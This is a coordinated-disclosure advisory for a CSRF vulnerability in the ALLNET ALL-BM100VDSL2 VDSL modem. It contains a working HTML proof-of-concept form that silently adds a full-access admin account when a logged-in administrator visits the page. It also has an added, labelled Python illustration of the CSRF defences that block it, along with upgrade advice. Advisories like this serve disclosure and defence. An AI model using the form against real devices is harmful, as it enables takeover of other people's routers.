VDSL Client Modem ALL-BM100VDSL2: CSRF
Date: 2017-05-09 13:40:21

1. Introduction
Affected Product: VDSL Client Modem ALL-BM100VDSL2 C.4.6a
Fixed in: C.4.8a
Fixed Version Link: http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Vendor Website: http://www.allnet.de/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 12/20/2016
Disclosed to public: 04/13/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits: Tim Coen & Marcus Gruber of Curesec GmbH
2. Overview
The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to CSRF.
3. Details
CSRF
CVSS: High 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Description: The web interface does not have any CSRF protection. It is, for example, possible to add a new admin user with full access by luring a logged-in administrator onto a page that auto-submits the following form.
Proof of Concept:
<html>
  <body>
    <form action="http://192.168.16.254/goform/ifx_set_system_password" method="POST">
      <input type="hidden" name="page" value="system_password.htm" />
      <input type="hidden" name="curr_user_id" value="1" />
      <input type="hidden" name="submitflag" value="1" />
      <input type="hidden" name="users" value="<New User>" />
      <input type="hidden" name="userEnable" value="1" />
      <input type="hidden" name="userNew" value="admin2" />
      <input type="hidden" name="user_passwd_edit_enable" value="1" />
      <input type="hidden" name="userNewPswd" value="admin" />
      <input type="hidden" name="userConPswd" value="admin" />
      <input type="hidden" name="userLaccess" value="1" />
      <input type="hidden" name="userRaccess" value="1" />
      <input type="hidden" name="userFTPaccess" value="1" />
      <input type="hidden" name="userSMBaccess" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
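The following is an added illustration, not code from the advisory or from the vendor's firmware: it models the affected form handler twice, once without any check (the behaviour described above) and once with the two controls a handler needs so that a cross-site auto-submitting form like the PoC is refused: an Origin/Referer check against the interface's own origin, and a per-session synchronizer token that the attacker's page cannot read. The host 192.168.16.254 is taken from the PoC; the session structure, the handler signatures and the attacker origin are assumptions made for the example.

```python
"""Added example, not the vendor's code: unprotected vs. CSRF-protected
handling of a POST to /goform/ifx_set_system_password.
Session shape, handler signatures and attacker origin are assumptions."""
import hmac
import secrets
from html import escape
from urllib.parse import urlsplit

# Assumption: the modem's web UI is only ever served from this origin
# (the PoC posts to 192.168.16.254).
TRUSTED_ORIGINS = {"http://192.168.16.254"}

# Constructed: the hidden fields the PoC form submits.
POC_FORM = {
    "page": "system_password.htm",
    "curr_user_id": "1",
    "submitflag": "1",
    "users": "<New User>",
    "userEnable": "1",
    "userNew": "admin2",
    "user_passwd_edit_enable": "1",
    "userNewPswd": "admin",
    "userConPswd": "admin",
    "userLaccess": "1",
    "userRaccess": "1",
    "userFTPaccess": "1",
    "userSMBaccess": "1",
}


def new_session():
    """Server-side session of a logged-in admin with a fresh random token.
    The token exists only in the session and in pages served from the
    trusted origin, so a page on another origin cannot read it."""
    return {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}


def render_password_form(session):
    """Synchronizer-token pattern: the legitimate form carries the session
    token as a hidden field that the handler compares on submission."""
    return (
        '<form action="/goform/ifx_set_system_password" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{escape(session["csrf_token"])}" />\n'
        '  <input type="text" name="userNew" />\n'
        "</form>"
    )


def _request_origin(headers):
    """scheme://host[:port] of the page that issued the request, from the
    Origin header (browsers send it on cross-site POSTs) or else Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}"


def handle_unprotected(session, headers, form):
    """Behaviour the advisory describes: any POST carrying the admin's
    session is honoured, so the attacker's page succeeds."""
    if session.get("user") != "admin":
        return 403, "not logged in"
    return 200, f"user {form['userNew']} created"


def handle_protected(session, headers, form):
    """Hardened handler: refuse cross-site origins and token mismatches
    before touching any state."""
    if session.get("user") != "admin":
        return 403, "not logged in"
    origin = _request_origin(headers)
    if origin is None:
        # Strict choice: state-changing requests without Origin/Referer are refused.
        return 403, "missing Origin/Referer"
    if origin not in TRUSTED_ORIGINS:
        return 403, f"cross-site request from {origin}"
    token = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return 403, "CSRF token missing or invalid"
    return 200, f"user {form['userNew']} created"


if __name__ == "__main__":
    session = new_session()
    attacker = {"Origin": "http://attacker.example"}  # constructed origin
    legit = {"Origin": "http://192.168.16.254"}
    print("unprotected, cross-site:", handle_unprotected(session, attacker, POC_FORM))
    print("protected, cross-site:", handle_protected(session, attacker, POC_FORM))
    print("protected, same-origin, no token:", handle_protected(session, legit, POC_FORM))
    print("protected, same-origin, token:",
          handle_protected(session, legit, dict(POC_FORM, csrf_token=session["csrf_token"])))
```

The origin check alone stops the browser-delivered form in the PoC, and the token check covers clients or proxies that strip Origin and Referer; using both means a request must come from the interface's own pages and carry a value only those pages know.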
4. Solution
To mitigate this issue please upgrade at least to version C.4.8a:
http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Please note that a newer version might already be available.
5. Report Timeline
12/20/2016: Informed Vendor about Issue
12/23/2016: Vendor announces release of new firmware
02/15/2017: Reminded Vendor about disclosure date
03/01/2017: Vendor releases new Version
04/13/2017: Disclosed to public